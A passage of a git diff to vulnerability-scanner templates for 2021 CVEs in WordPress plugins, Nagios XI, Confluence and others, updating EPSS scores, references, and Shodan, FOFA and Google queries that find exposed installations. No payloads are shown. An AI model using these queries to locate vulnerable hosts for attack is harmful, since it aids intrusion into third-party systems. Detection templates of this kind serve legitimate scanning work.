cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 23ec47cec5..83bf3b7bc4 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24627 cwe-id: CWE-89 - epss-score: 0.14515 - epss-percentile: 0.95609 + epss-score: 0.30355 + epss-percentile: 0.96947 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: g_auto-hyperlink framework: wordpress publicwww-query: /wp-content/plugins/g-auto-hyperlink/ + shodan-query: http.html:/wp-content/plugins/g-auto-hyperlink/ + fofa-query: body=/wp-content/plugins/g-auto-hyperlink/ tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index c5ea07681d..cd5ba49a13 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2021-24647 cwe-id: CWE-287 - epss-score: 0.22598 - epss-percentile: 0.96397 + epss-score: 0.20385 + epss-percentile: 0.96356 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 34085ea7cf..c1fb04e22b 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24731 cwe-id: CWE-89 - epss-score: 0.14786 - epss-percentile: 0.95651 + epss-score: 0.25417 + epss-percentile: 0.96689 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index e70a4f07bc..59d52e2340 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24746 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 3d3f91006c..1ebbaa838e 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24750 cwe-id: CWE-89 - epss-score: 0.02112 - epss-percentile: 0.8802 + epss-score: 0.02059 + epss-percentile: 0.88991 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index f6960c5ac3..3b46901aee 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -13,13 +13,15 @@ info: reference: - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42838 + epss-percentile: 0.43227 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index deee9aec79..eacd0704ad 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24849 cwe-id: CWE-89 epss-score: 0.02367 - epss-percentile: 0.89583 + epss-percentile: 0.89814 cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace + fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 1f03c3cb18..a25744d26b 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 - epss-score: 0.72686 - epss-percentile: 0.97816 + epss-score: 0.71273 + epss-percentile: 0.98052 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 523b7e7fbc..f6b3138b75 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.50097 + epss-percentile: 0.50073 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index adeac5087a..e17238227a 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -14,13 +14,14 @@ info: - https://www.jbelamor.com/xss-elementor-lightox.html - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d - https://nvd.nist.gov/vuln/detail/CVE-2021-24891 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45185 + epss-percentile: 0.45236 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -28,7 +29,6 @@ info: product: website_builder framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index c52440bb78..c7b59060d0 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24915 cwe-id: CWE-89 - epss-score: 0.22351 - epss-percentile: 0.96057 + epss-score: 0.25422 + epss-percentile: 0.9669 cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: contest_gallery framework: wordpress publicwww-query: "/wp-content/plugins/contest-gallery/" + shodan-query: http.html:/wp-content/plugins/contest-gallery/ + fofa-query: body=/wp-content/plugins/contest-gallery/ tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 28a468b30b..f08202d415 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -12,13 +12,15 @@ info: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 - https://nvd.nist.gov/vuln/detail/CVE-2021-24917 - https://wordpress.org/support/topic/bypass-security-issue/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 - epss-score: 0.03563 - epss-percentile: 0.90675 + epss-score: 0.04098 + epss-percentile: 0.92139 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 8e4826b49b..2acffb37c4 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 - epss-percentile: 0.53153 + epss-percentile: 0.54011 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 6eb73e7bd6..7f6c46512c 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24940 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42899 + epss-percentile: 0.43227 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index b85b13fc17..a81863dedf 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24943 cwe-id: CWE-89 - epss-score: 0.21158 - epss-percentile: 0.96299 + epss-score: 0.20551 + epss-percentile: 0.96367 cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: registrations_for_the_events_calendar framework: wordpress publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ + fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 77765a0524..f284ecda8b 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 - epss-score: 0.12445 - epss-percentile: 0.94942 + epss-score: 0.11865 + epss-percentile: 0.95325 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 9796ad8438..d7e1e07bba 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 - epss-score: 0.00315 - epss-percentile: 0.69672 + epss-score: 0.00398 + epss-percentile: 0.73461 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index cdc485b1ed..47631179bd 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 - https://wordpress.org/plugins/all-in-one-video-gallery - https://nvd.nist.gov/vuln/detail/CVE-2021-24970 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24970 cwe-id: CWE-22 - epss-score: 0.03639 - epss-percentile: 0.90767 + epss-score: 0.0297 + epss-percentile: 0.90861 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 7ec3b86095..462f0b3242 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -26,6 +26,9 @@ info: product: paid_memberships_pro framework: wordpress publicwww-query: /wp-content/plugins/paid-memberships-pro/ + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios http: diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 991a425d77..83d6467a16 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25003 cwe-id: CWE-434,CWE-94 - epss-score: 0.61252 - epss-percentile: 0.97725 + epss-score: 0.61181 + epss-percentile: 0.97795 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 2223d5342d..352c776b7b 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 5495d8a66f..e92757d723 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -26,6 +26,8 @@ info: product: chaty framework: wordpress publicwww-query: "/wp-content/plugins/chaty/" + shodan-query: http.html:/wp-content/plugins/chaty/ + fofa-query: body=/wp-content/plugins/chaty/ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index 801f97ef93..2908de28bf 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25033 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index ac3db17e5e..ac1d045abd 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.01998 - epss-percentile: 0.88568 + epss-percentile: 0.88806 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 0a98c205c0..fdaad78ff7 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb - https://nvd.nist.gov/vuln/detail/CVE-2021-25063 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42838 + epss-percentile: 0.43227 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index b93d7867d1..95412664b1 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.2831 + epss-percentile: 0.29862 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: smash_balloon_social_post_feed framework: wordpress publicwww-query: "/wp-content/plugins/custom-facebook-feed/" + shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/ + fofa-query: body=/wp-content/plugins/custom-facebook-feed/ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 2e52fe0e79..0aa6bc1c92 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc - https://wordpress.org/plugins/page-builder-add/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25067 + - https://github.com/kazet/wpgarlic + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.285 + epss-percentile: 0.29862 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 9a171705a1..5cbce79e79 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.00071 - epss-percentile: 0.28959 + epss-percentile: 0.30442 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 40a84382ea..ae07f65a34 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.72505 + epss-percentile: 0.72963 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index 8966b0c494..f116995a9c 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40882 + epss-percentile: 0.41295 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 4dfb9568de..eba5ae5a8a 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25085 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 9ad8526fe2..437a7437e3 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 01f582930c..4fe58eeb3a 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25111 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 6b5942531e..cf4851f126 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25114 cwe-id: CWE-89 - epss-score: 0.0412 - epss-percentile: 0.91962 + epss-score: 0.03548 + epss-percentile: 0.91594 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,9 @@ info: product: paid_memberships_pro framework: wordpress google-query: inurl:"/wp-content/plugins/paid-memberships-pro" + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios http: diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 88e63fa569..fa4359d96f 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 6c3a1daa56..12959a1a31 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25281 cwe-id: CWE-287 epss-score: 0.87406 - epss-percentile: 0.98556 + epss-percentile: 0.98631 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index bcf503b7ff..c22b08f84c 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25296 cwe-id: CWE-78 - epss-score: 0.89514 - epss-percentile: 0.98511 + epss-score: 0.89037 + epss-percentile: 0.98721 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 389f33f82b..d946f96fb6 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 - epss-score: 0.90211 - epss-percentile: 0.98732 + epss-score: 0.89037 + epss-percentile: 0.98721 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios http: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 214437d510..9348bd038d 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -30,6 +30,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios http: diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 13c30457a9..83d6bb74ef 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25299 cwe-id: CWE-79 - epss-score: 0.96845 - epss-percentile: 0.99634 + epss-score: 0.9644 + epss-percentile: 0.99577 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve2021,cve,nagios,nagiosxi,xss,authenticated http: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index ea7c8c4f6c..e8c2507f0a 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 - epss-score: 0.97323 - epss-percentile: 0.99871 + epss-score: 0.97385 + epss-percentile: 0.99912 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 67c822816a..f7281998c8 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25864 cwe-id: CWE-22 epss-score: 0.29108 - epss-percentile: 0.96769 + epss-percentile: 0.96881 cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* metadata: max-request: 1 @@ -28,6 +28,8 @@ info: product: huemagic framework: node.js shodan-query: title:"NODE-RED" + fofa-query: title="node-red" + google-query: intitle:"node-red" tags: cve2021,cve,huemagic,lfi,dgtl,node.js http: diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 1042351d65..5a45e0c1fc 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -28,6 +28,7 @@ info: vendor: void product: aurall_rec_monitor shodan-query: html:"AURALL" + fofa-query: body="aurall" tags: cve2021,cve,sqli,void,aurall http: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index e5f4fea18f..8ddeda2511 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26084 cwe-id: CWE-917 - epss-score: 0.97414 - epss-percentile: 0.99924 + epss-score: 0.97447 + epss-percentile: 0.99948 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 13 vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian http: diff --git a/http/cves/2021/CVE-2021-26085.yaml 